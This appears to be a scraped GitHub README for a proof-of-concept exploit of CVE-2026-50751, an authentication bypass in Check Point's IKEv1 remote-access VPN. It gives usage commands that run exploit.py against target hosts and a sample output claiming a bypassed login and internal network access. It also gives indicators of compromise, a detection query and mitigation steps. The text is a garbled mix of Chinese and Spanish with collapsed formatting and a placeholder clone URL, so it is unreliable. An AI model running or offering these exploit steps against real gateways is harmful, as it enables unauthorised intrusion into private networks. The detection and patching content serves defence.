fevar54/CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit

GitHub: fevar54/CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit

针对 Check Point IKEv1 身份验证绕过高危漏洞的 PoC 利用与检测工具，包含漏洞探测、认证绕过利用及入侵检测指标。

Stars: 1 | Forks: 2

# CVE-2026-50751 - Check Point IKEv1 身份验证绕过漏洞利用 [![安全评级](https://img.shields.io/badge/Security-Critical-red)](https://nvd.nist.gov/vuln/detail/CVE-2026-50751) [![CVSS](https://img.shields.io/badge/CVSS-9.3-critical)](https://nvd.nist.gov/vuln/detail/CVE-2026-50751) [![CISA KEV](https://img.shields.io/badge/CISA%20KEV-2026--06--08-orange)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) [![许可证](https://img.shields.io/badge/License-GPLv3-blue)](LICENSE) [![Python](https://img.shields.io/badge/Python-3.8+-yellow)](https://www.python.org/) ## ⚠️ 重要警告 **此代码仅供教育目的和授权的安全测试使用。** 未经许可对系统进行未经授权的使用是非法的。作者不对本工具的滥用承担责任。 ## 📋 描述 CVE-2026-50751 是 Check Point 的 IKEv1（已弃用）协议中一个严重的身份验证绕过漏洞，影响 Remote Access VPN 和 Mobile Access。未经身份验证的攻击者可以利用证书验证中的缺陷建立 VPN 连接，而无需有效的密码。 ### 技术细节 - **类型**：身份验证绕过 (CWE-287) - **CVSS 评分**：9.3（严重） - **向量**：AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N - **活跃利用**：是（自 2026-05-07 起） - **CISA KEV**：添加于 2026-06-08，截止日期 2026-06-11 ## 🎯 受影响版本 | 产品 | 版本 | |----------|-----------| | Security Gateways | R80.40 - R82.10（启用 IKEv1） | | Spark Firewalls | R80.20.X, R81.10.X, R82.00.X | | Mobile Access | 所有支持 IKEv1 的版本 | ### 必要条件 - ✅ 启用 VPN Remote Access 或 Mobile Access - ✅ 为 remote access 启用 IKEv1 - ✅ Gateway 接受传统的 Remote Access 客户端 - ✅ 不需要机器证书 ## 🔧 安装 ``` # 克隆 repositorio git clone https://github.com/username/CVE-2026-50751-PoC cd CVE-2026-50751-PoC # 安装 dependencias pip install -r requirements.txt # 赋予 ejecución 权限 chmod +x exploit.py 📦 Dependencias txt cryptography>=41.0.0 scapy>=2.5.0 🚀 Uso Escaneo de detección bash # 检测 IKEv1 是否启用 python3 detector.py -t 192.168.1.1 -p 500 # 快速扫描 python3 detector.py -t vpn.target.com -p 4500 Explotación (AUTHORIZED USE ONLY) bash # 执行 bypass de autenticación python3 exploit.py -t 192.168.1.1 -p 500 # 使用特定 interfaz python3 exploit.py -t vpn.target.com --interface eth0 # verbose 模式 python3 exploit.py -t 192.168.1.1 -p 500 -v Output esperado text ╔═══════════════════════════════════════════════════════════════╗ ║ CVE-2026-50751 - Check Point IKEv1 Authentication Bypass ║ ║ Critical VPN Authentication Bypass Exploit ║ ║ CVSS: 9.3 | CISA KEV: 2026-06-08 ║ ╚═══════════════════════════════════════════════════════════════╝ [1] Initiating IKEv1 Main Mode... [+] Received response - SPI: a1b2c3d4e5f67890 [2] Sending crafted KE + NONCE payloads... [+] Gateway accepted crafted KE/NONCE - Vulnerability triggered! [3] Calculating authentication keys... [4] Sending spoofed authentication... [+] SUCCESS! Authentication bypassed! [+] Established IKE SA without valid credentials [5] Establishing VPN tunnel... [+] VPN tunnel established! [+] Internal network access available [✓] EXPLOIT SUCCESSFUL [✓] Authentication bypass achieved [✓] VPN tunnel established [!] System is VULNERABLE - Apply hotfix immediately 🔍 Detección de Compromiso Buscar en logs de SmartConsole bash # 用于检测攻击者的 Query action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152) IOCs Conocidos Tipo Valor IPs atacantes 45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173 Hashes 52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce 🛡️ Mitigación Opción 1 - Aplicar Hotfix (RECOMENDADO) Versión Hotfix Take Link R82.10 Take 19 Descargar R82 Take 103 Descargar R81.20 Take 141 Descargar Opción 2 - Mitigaciones Temporales Deshabilitar legacy clients: SmartConsole → Gateway → VPN Clients → Authentication Desmarcar "Allow older clients" Forzar IKEv2 solamente: Global Properties → Remote Access → VPN Authentication Seleccionar "IKEv2 only" Hacer obligatorio Machine Certificate: VPN Clients → Authentication → Machine Certificate Authentication Setear como "Mandatory" 📚 Referencias NVD - CVE-2026-50751 Check Point SK185033 CISA Known Exploited Vulnerabilities Blog Post - Check Point Research 📊 Timeline Fecha Evento 2026-05-07 Primera explotación observada 2026-06-04 Check Point inicia investigación 2026-06-08 CVE publicado, CISA añade a KEV 2026-06-11 Fecha límite CISA para parchear ⚖️ Disclaimer Este software se proporciona "tal cual", sin garantías de ningún tipo. El autor no es responsable por el uso indebido de esta herramienta. Úsela únicamente en sistemas que posea o tenga autorización explícita para probar. 📞 Contacto Para reportar bugs o contribuir: Abrir un issue en GitHub Contacto: security.research@example.com 🌟 Créditos Check Point Research - Por el descubrimiento y análisis CISA - Por la coordinación y difusión Comunidad de seguridad - Por la respuesta rápida ⭐ Si este PoC te fue útil, considera darle una estrella al repositorio text ## 📄 **LICENSE** (GPLv3) 📦 requirements.txt txt cryptography>=41.0.0 scapy>=2.5.0 colorama>=0.4.6 ⚠️ Nota importante para GitHub: ```

标签：Check Point, CISA项目, Python, VPN, 无后门, 身份认证绕过, 逆向工具